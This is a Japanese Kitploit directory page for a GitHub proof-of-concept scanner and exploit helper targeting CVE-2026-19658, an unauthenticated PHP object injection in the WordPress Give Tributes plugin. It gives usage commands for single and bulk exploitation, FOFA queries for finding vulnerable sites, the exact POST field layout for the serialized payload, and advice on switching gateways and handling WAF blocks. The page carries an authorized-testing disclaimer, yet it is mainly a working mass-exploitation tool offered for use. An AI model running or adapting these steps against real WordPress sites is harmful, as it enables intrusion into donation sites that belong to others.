Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-19658 — CVE-2026-19658(WordPress Give TributesのPHPオブジェクトインジェクション脆弱性)に対応するPython 3のチェッカー兼エクスプロイトヘルパー。FOFAによるターゲット探索とレガシー寄付フォームのエクスプロイト機能を備える。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-19658
偵察脆弱性スキャナー脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテストペイロード開発
GitHubmurrez/cve-2026-19658
151日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-19658

CVE-2026-19658(WordPress Give TributesのPHPオブジェクトインジェクション脆弱性)に対応するPython 3のチェッカー兼エクスプロイトヘルパー。FOFAによるターゲット探索とレガシー寄付フォームのエクスプロイト機能を備える。

リポジトリを見る

CVE-2026-19658 — Give Tributes 未認証 PHP オブジェクトインジェクション

WordPress アドオン Give - Tributes (Liquid Web / GiveWP) における CVE-2026-19658 の Python 3 による概念実証 スキャナーおよび寄付チェーンエクスプロイトヘルパー。

プラットフォームWordPress プラグイン (GiveWP コアが必要)
コンポーネントGive - Tributes
影響を受けるバージョン≤ 2.3.1
修正バージョン2.3.1.1+ (サニタイズされた複数受信者 eCard フィールド)
CVSS9.8 Critical
認証未認証 (レガシー寄付フォーム)
CWECWE-502 — 信頼できないデータのデシリアライズ
割り当て者Wordfence

概要

eCard で Allow Multiple Recipients が有効化されており、かつ eCard custom message が無効化されている (デフォルト) 場合、脆弱なバージョンでは 生の $_POST eCard 受信者データが寄付メタに保存されます。GiveWP のフィールド検証は $_POST の give_clean() コピーを使用します (シリアライズされた文字列はそこで空白化されます) が、insert_tribute_data() は サニタイズされていない $_POST を読み取るため、2 番目の受信者の first_name / last_name に PHP シリアライズオブジェクトを含めることができます。

影響: Give Tributes 単体では既知の POP チェーンはありません。メタは読み取り時 (例: 管理者による eCard プレビュー/再送信) にデシリアライズされます。RCE または破壊的な影響 には、別の インストール済みプラグインまたはテーマからのガジェットチェーンが必要です。

サーバー側の前提条件

  1. Give Tributes ≤ 2.3.1
  2. Allow Multiple Recipients が有効 (グローバルまたはフォーム単位)
  3. eCard Custom Message が無効 (デフォルト)
  4. 公開された レガシー Give フォーム ([give_form] / v2)、v3 専用の Visual Form Builder ではない
  5. テストで寄付を完了できる決済ゲートウェイ (開発/ステージングでは多くの場合 manual)

要件

  • Python 3.8+
  • pip install -r requirements.txt

クイックスタート

root@kitploit:~
pip install -r requirements.txt

# 単一ターゲット — チェック (--list ではデフォルトでターミナルフローが有効)
python poc.py -u https://target.example --mode check

# 一括チェック
python poc.py --list targets.example.txt --mode check --threads 20 --flow

# 単一ターゲット — エクスプロイト (許可されたターゲットのみ)
python poc.py -u https://target.example --mode exploit \
  --form-url /donate/ --form-id 123 --gateway manual \
  --payload 'O:8:"stdClass":0:{}'

# チェック出力からの一括エクスプロイト
python poc.py --list candidates.jsonl --mode exploit --threads 8 --flow \
  --vuln-list exploited.txt

FOFA → ターゲットリスト

例:

root@kitploit:~
body="/wp-content/plugins/give-tributes/"
body="give-tributes" && body="givewp"

ホストリスト (1 行に 1 ドメイン):

root@kitploit:~
python poc.py --list my_hosts.txt --mode check --threads 20 --flow

FOFA CSV エクスポート:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
python poc.py --list list.txt --mode check --threads 20

CLI オプション

エクスプロイト実行時は --vuln-list exploited.txt を使用して、hits.txt 内のチェックヒットが上書きされないようにしてください。

出力ファイル

チェックの status 値

リモートスキャンでは「Allow Multiple Recipients」を確実に確認することは できません。候補はエクスプロイト時に失敗する可能性があります。

エクスプロイトの注意点

  • PoC は 2 つ の eCard 受信者を送信します。ペイロードは 2 番目 の first_name フィールドです。
  • manual ゲートウェイ は本番環境では無効化されていることが多いため、フォーム上で表示されるゲートウェイ (stripe、paypal、test、…) を試してください。
  • 成功には Give のレシートマーカー が必要です (「thank you」を含む一般的なページコピーではない)。フォームがまだ存在する同じ URL は 成功としてカウントされません。
  • give validation rejected donation: tribute/notify オプション、金額、またはゲートウェイの不一致。
  • HTTP 403: POST をブロックする WAF (Sucuri、MalCare など)。
  • v3 専用フォーム: レガシーフォームの URL を使用するかスキップしてください (プロセッサはレガシーエンドポイントで v3 ID を拒否します)。

POST の形式 (レガシーフォーム)

root@kitploit:~
give_tributes_show_dedication=yes
give_tributes_would_to=send_eCard
give_tributes_ecard_notify[recipient][first_name][]=Valid
give_tributes_ecard_notify[recipient][first_name][]=<serialized payload>
give_tributes_ecard_notify[recipient][email][]=<donor email>
give_tributes_ecard_notify[recipient][email][][email protected]
…

リポジトリ構成

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

ローカルスキャンリストと実行成果物 (list.txt、fofa*.csv、*.jsonl、hits.txt、…) は .gitignore に含まれており、コミットしないでください。

参考資料

  • NVD — CVE-2026-19658
  • Give Tributes readme (修正ノート 2.3.1.1)
  • GiveWP プラグイン

法的注意

許可されたセキュリティテストおよび教育 のみを目的としています。適用される法律およびプログラム規則の遵守はあなたの責任です。

ツールをダウンロード
オプション説明
-u, --url単一のベース URL
--listURL リスト、ホストファイル、または candidates.jsonl
--modecheck または exploit
--form-url寄付ページのパスまたは完全な URL
--form-idGive フォームの投稿 ID
--pathsフォームをクロールする追加パス
--payload2 番目の受信者の first_name 用のシリアライズオブジェクト
--gatewayGive の payment-mode (デフォルト manual)
--email寄付者の give_email
--flow一括実行時にターゲットごとに 1 行 (--list でデフォルト)
--no-flow進捗サマリーのみ
--quiet, -qコンソール出力を最小化
--threads, -j一括同時実行数 (デフォルト 12)
--outputJSONL ログ (デフォルト cve_2026_19658_results.jsonl)
--vuln-listテキストのヒット / エクスプロイト行 (デフォルト hits.txt)
--candidates-listチェックメタデータ JSONL (デフォルト candidates.jsonl)
ファイルモード内容
cve_2026_19658_results.jsonl両方ターゲットごとの完全な JSON
hits.txtcheckexploitable_candidate を含む URL
candidates.jsonlcheckbest_form、バージョンヒント
exploited.txtexploit寄付が確認された場合の url|payment=…
ステータス意味
candidate脆弱なプラグイン + Give + tributes UI を持つレガシーフォーム
vulnerable_no_formプラグイン/バージョンは OK、クロールしたパスに適切なフォームが見つからない
patchedTributes > 2.3.1 または ≥ 2.3.1.1 (バージョンが読み取れる場合)
give_onlyTributes が検出できない Give
no_pluginTributes が検出されない